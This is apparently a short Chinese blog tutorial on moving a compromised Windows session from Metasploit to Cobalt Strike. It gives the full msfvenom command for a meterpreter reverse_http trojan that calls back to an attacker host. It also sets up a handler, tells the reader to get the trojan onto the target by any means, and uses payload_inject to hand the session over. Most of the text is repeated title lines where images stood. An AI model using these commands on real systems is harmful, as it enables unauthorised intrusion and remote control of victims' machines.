Meteasploit -> CS 【会话转移】

流程:

  大致流程,msfvenom生成木马->目标机运行木马->msf监听到会话->转移到CS

开始:

  先让服务端的CS上线

Meteasploit -> CS 【会话转移】

  

  cs客户端连接cs服务端

Meteasploit -> CS 【会话转移】

  

  

  cs设置监听

 Meteasploit -> CS 【会话转移】

 

 

   生成木马  msfvenom -p windows/x64/meterpreter_reverse_http lhost=104.xx.xx.xx lport=6677 -f exe -o msf1.exe

Meteasploit -> CS 【会话转移】

 

 

   生成后开启监听模块

Meteasploit -> CS 【会话转移】

 

 

   查看详细常数

  Meteasploit -> CS 【会话转移】

  

 

   设置set exitonsession false

   exploit -j 开始执行

Meteasploit -> CS 【会话转移】

 

 

  然后把木马msf1.exe想办法弄到目标机上且运行起来,拿到会话如下

Meteasploit -> CS 【会话转移】

  

 

  拿到回话之后,重新设置新模块use exploit/windows/local/payload_inject

Meteasploit -> CS 【会话转移】

Meteasploit -> CS 【会话转移】

 

 

  设置参数

Meteasploit -> CS 【会话转移】

 

 

   设置完毕后开始执行!run

Meteasploit -> CS 【会话转移】

 

 

   转移成功

Meteasploit -> CS 【会话转移】

 

上一篇:计算机视觉论文-2021-09-14


下一篇:ASP.NET MVC - BundleConfig.cs